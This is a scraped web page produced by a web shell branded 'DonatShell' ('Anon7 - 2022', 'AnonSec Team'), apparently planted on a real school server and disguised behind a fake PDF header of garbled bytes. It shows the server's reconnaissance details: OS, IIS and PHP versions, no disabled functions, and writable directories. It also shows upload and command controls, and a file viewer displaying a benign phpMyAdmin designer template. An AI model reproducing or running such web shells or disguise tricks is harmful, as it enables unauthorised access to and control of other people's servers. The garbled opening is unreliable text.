%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : www.kowitt.ac.th  /  Your IP : 216.73.216.118
Web Server : Microsoft-IIS/7.5
System : Windows NT SERVER02 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.6.31
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/phpMyAdmin/templates/database/designer/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/inetpub/wwwroot/phpMyAdmin/templates/database/designer/options_panel.phtml
<table id="pmd_optionse" style="display:none;" width="5%" cellpadding="0" cellspacing="0">
    <tbody>
        <tr>
            <td class="frams1" width="10px">
            </td>
            <td class="frams5" width="99%" >
            </td>
            <td class="frams2" width="10px">
                <div class="bor">
                </div>
            </td>
        </tr>
        <tr>
            <td class="frams8">
            </td>
            <td class="input_tab">
                <table width="168" class="center" cellpadding="2" cellspacing="0">
                    <thead>
                        <tr>
                            <td colspan="2" rowspan="2" id="option_col_name" class="center nowrap">
                            </td>
                        </tr>
                    </thead>
                    <tbody id="where">
                        <tr>
                            <td class="center nowrap">
                                <b>
                                    WHERE
                                </b>
                            </td>
                        </tr>
                        <tr>
                            <td width="58" class="nowrap">
                                <?= __('Relation operator'); ?>
                            </td>
                            <td width="102">
                                <select name="rel_opt" id="rel_opt">
                                    <option value="--" selected="selected">
                                        --
                                    </option>
                                    <option value="=">
                                        =
                                    </option>
                                    <option value="&gt;">
                                        &gt;
                                    </option>
                                    <option value="&lt;">
                                        &lt;
                                    </option>
                                    <option value="&gt;=">
                                        &gt;=
                                    </option>
                                    <option value="&lt;=">
                                        &lt;=
                                    </option>
                                    <option value="NOT">
                                        NOT
                                    </option>
                                    <option value="IN">
                                        IN
                                    </option>
                                    <option value="EXCEPT">
                                        <?= __('Except'); ?>
                                    </option>
                                    <option value="NOT IN">
                                        NOT IN
                                    </option>
                                </select>
                            </td>
                        </tr>
                        <tr>
                            <td class="nowrap">
                                <?= __('Value'); ?>
                                <br />
                                <?= __('subquery'); ?>
                            </td>
                            <td>
                                <textarea id="Query" value="" cols="18">
                                </textarea>
                            </td>
                        </tr>
                        <tr>
                            <td class="center nowrap">
                                <b>
                                    <?= __('Rename to'); ?>
                                </b>
                            </td>
                        </tr>
                        <tr>
                            <td width="58" class="nowrap">
                                <?= __('New name'); ?>
                            </td>
                            <td width="102">
                                <input type="text" value="" id="new_name"/>
                            </td>
                        </tr>
                        <tr>
                            <td class="center nowrap">
                                <b>
                                    <?= __('Aggregate'); ?>
                                </b>
                            </td>
                        </tr>
                        <tr>
                            <td width="58" class="nowrap">
                                <?= __('Operator'); ?>
                            </td>
                            <td width="102">
                                <select name="operator" id="operator">
                                    <option value="---" selected="selected">
                                        ---
                                    </option>
                                    <option value="sum" >
                                        SUM
                                    </option>
                                    <option value="min">
                                        MIN
                                    </option>
                                    <option value="max">
                                        MAX
                                    </option>
                                    <option value="avg">
                                        AVG
                                    </option>
                                    <option value="count">
                                        COUNT
                                    </option>
                                </select>
                            </td>
                        </tr>
                        <tr>
                            <td width="58" class="center nowrap">
                                <b>
                                    GROUP BY
                                </b>
                            </td>
                            <td>
                                <input type="checkbox" value="groupby" id="groupby"/>
                            </td>
                        </tr>
                        <tr>
                            <td width="58" class="center nowrap">
                                <b>
                                    ORDER BY
                                </b>
                            </td>
                            <td>
                                <select name="orderby" id="orderby">
                                    <option value="---" selected="selected">
                                        ---
                                    </option>
                                    <option value="ASC" >
                                        ASC
                                    </option>
                                    <option value="DESC">
                                        DESC
                                    </option>
                                </select>
                            </td>
                        </tr>
                        <tr>
                            <td class="center nowrap">
                                <b>
                                    HAVING
                                </b>
                            </td>
                        </tr>
                        <tr>
                            <td width="58" class="nowrap">
                                <?= __('Operator'); ?>
                            </td>
                            <td width="102">
                                <select name="h_operator" id="h_operator">
                                    <option value="---" selected="selected">
                                        ---
                                    </option>
                                    <option value="None" >
                                        <?= __('None'); ?>
                                    </option>
                                    <option value="sum" >
                                        SUM
                                    </option>
                                    <option value="min">
                                        MIN
                                    </option>
                                    <option value="max">
                                        MAX
                                    </option>
                                    <option value="avg">
                                        AVG
                                    </option>
                                    <option value="count">
                                        COUNT
                                    </option>
                                </select>
                            </td>
                        </tr>
                        <tr>
                            <td width="58" class="nowrap">
                                <?= __('Relation operator'); ?>
                            </td>
                            <td width="102">
                                <select name="h_rel_opt" id="h_rel_opt">
                                    <option value="--" selected="selected">
                                        --
                                    </option>
                                    <option value="=">
                                        =
                                    </option>
                                    <option value="&gt;">
                                        &gt;
                                    </option>
                                    <option value="&lt;">
                                        &lt;
                                    </option>
                                    <option value="&gt;=">
                                        &gt;=
                                    </option>
                                    <option value="&lt;=">
                                        &lt;=
                                    </option>
                                    <option value="NOT">
                                        NOT
                                    </option>
                                    <option value="IN">
                                        IN
                                    </option>
                                    <option value="EXCEPT">
                                        <?= __('Except'); ?>
                                    </option>
                                    <option value="NOT IN">
                                        NOT IN
                                    </option>
                                </select>
                            </td>
                        </tr>
                        <tr>
                            <td width="58" class="nowrap">
                                <?= __('Value'); ?>
                                <br/>
                                <?= __('subquery'); ?>
                            </td>
                            <td width="102">
                                <textarea id="having" value="" cols="18">
                                </textarea>
                            </td>
                        </tr>
                    </tbody>
                    <tbody>
                        <tr>
                            <td colspan="2" class="center nowrap">
                                <input type="button" id="ok_add_object" class="butt" name="Button" value="<?= __('OK'); ?>" />
                                <input type="button" id="cancel_close_option" class="butt" name="Button" value="<?= __('Cancel'); ?>" />
                            </td>
                        </tr>
                    </tbody>
                </table>
            </td>
            <td class="frams6">
            </td>
        </tr>
        <tr>
            <td class="frams4">
                <div class="bor">
                </div>
            </td>
            <td class="frams7">
            </td>
            <td class="frams3">
            </td>
        </tr>
    </tbody>
</table>

Anon7 - 2022
AnonSec Team